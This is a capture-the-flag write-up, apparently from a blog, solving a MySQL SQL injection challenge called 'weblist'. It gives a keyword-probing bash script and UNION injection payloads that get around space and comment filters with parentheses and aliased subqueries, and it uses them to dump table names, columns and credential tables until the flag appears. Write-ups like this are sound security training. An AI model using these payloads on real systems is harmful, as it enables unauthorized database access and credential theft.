Level 5 – weblist

Level 5 – weblist

The source:

source

A simple GET form.

Some official clues:

"weblist": the cute solution should use "union"... I'd like you find that way of solving challenge ;-) Kachakil couldn't :-P
"Weblist:" some ppl still missing certain property of MySQL with tables... :-#

Well, we’re in front of SQL injection.

If you try to submit the ‘”’ character alone you’ll get a MySQL error message:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '""") and wl.id=wld.list_id' at line 1

This message gives us a clue, the query must be something like:

SELECT wl.id,wld.list_id,... FROM table1 wl, table2 wld where wl.id IN(“our-input-parsed”) and wl.id = wld.list_id

our input must begin with ‘”)’ and end with ‘(“’, so the query executed will be like:

SELECT wl.id,wld.list_id,... FROM table1 wl, table2 wld where wl.id IN(“”)some-things(“”) and wl.id = wld.list_id

We need to find some-things to get the information we want and keep the valid syntax of the query. We need to deal with the ‘wl’ and ‘wld’ alias too.

Trying some inputs we see that there’re some keywords filtered.

If you try to submit:

1 and 1

you get:

'and' not allowed

Again, a script does the job finding the non-filtered keywords.

The script:

#!/bin/bash
#
# get allowed keywords
#
CONTENIDO=""
while read KEYWORD
do
  CONTENIDO=`wget -O - "http://ctf.rs-labs.com:83/weblist_85baaaf3d4593fcbaeb3878c0357cfd4/?list=1 ${KEYWORD} 1" 2>/dev/null | egrep -o 'not allowed'`
  if [ -z "${CONTENIDO}" ];
  then
    echo $KEYWORD
  fi
done < c5.keywords

The file c5.keywords contains all MySQL keywords. This is the list (reduced) we get:

FROM, HAVING, SELECT, UNION

Trying things as:

") union select 1,table_name from information_schema.tables

Knowing that this isn’t a valid injection due to the missing (“ end, we realize that spaces are filtered because we get the error:

'","union","select","1,table_name","from","information_schema.tables") and wl.id='

Our keywords are parsed and enclosed into “” and this isn’t good. Trying to replace spaces by comments: /**/ (which is valid for MySQL syntax), we get:

Only one comment is allowed, you're screwed! :-)

Hum! Enclosing operands (table names, column names, numbers,…) into () is also valid, so, we can write:

")union/**/select(1),(table_name)from(information_schema.tables)having("

This way, the end of our injection is ok. But we get:

Unknown column 'wl.id' in 'having clause'

This is ok, our query has passed the filters but we need to amend the alias part: ‘and wl.id=wld.list_id

We need to create two tables with wl and wld as alias names.
This is the trick:

(SELECT(1)id)wl

This subquery creates a temporary table with one column with id as alias and wl as an alias of the temp table itself.

If we join all together:

")union(select(table_name),(2),(3)from(information_schema.tables))union/**/select(1),(wl.id),(wld.list_id)from(select(2)id)wl,((select(2)list_id)wld)having("

(We need to add (2),(3) columns in the first select to match the number of columns in the original select, if we don’t add these fake columns the union fails).

Injecting the above we get all table names :)
The interesting table list:

UserPassword
UserPassword_55cf9c78f77986669bc362385cb55f97
WebList
WebListDescr

They look great!

Repeating the query for column names:

")union(select(column_name),(2),(3)from(information_schema.columns))union/**/select(1),(wl.id),(wld.list_id)from(select(2)id)wl,((select(2)list_id)wld)having("

We get:

login
password
login_3e1ce4bce9a68db1a1c576d1f76e5aa6
password_3e1ce4bce9a666b1a1c576d1f76e5aa6
id
name
list_id
description

Seems obvious that:

  • login‘ and ‘password‘ are the ‘UserPassword‘ columns
  • login_3e1ce4bce9a68db1a1c576d1f76e5aa6‘ and ‘password_3e1ce4bce9a666b1a1c576d1f76e5aa6‘ are the ‘UserPassword_55cf9c78f77986669bc362385cb55f97‘ columns
  • id‘ and ‘name‘ are the ‘WebList‘ columns
  • list_id‘ and ‘description‘ are the ‘WebListDescr‘ columns

If we watch at the ‘UserPassword‘ contents:

")union(select(login),(password),(3)from(UserPassword))union/**/select(1),(wl.id),(wld.list_id)from(select(2)id)wl,((select(2)list_id)wld)having("

We get:

“admin” “This is not the key :P But you are are very near now!”

Just another joke from admins… :P

The right query:

")union(select(login_3e1ce4bce9a68db1a1c576d1f76e5aa6),(password_3e1ce4bce9a666b1a1c576d1f76e5aa6),(3)from(UserPassword_55cf9c78f77986669bc362385cb55f97))union/**/select(1),(wl.id),(wld.list_id)from(select(2)id)wl,((select(2)list_id)wld)having("

Gives us the Flag:

“adm1n” “cH4nG3d_t0_fUcK_k4cH4K1l

I don’t know what Kachakil did to force admins to change the Flag!

Difficulty: Hard

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Antes de enviar el formulario: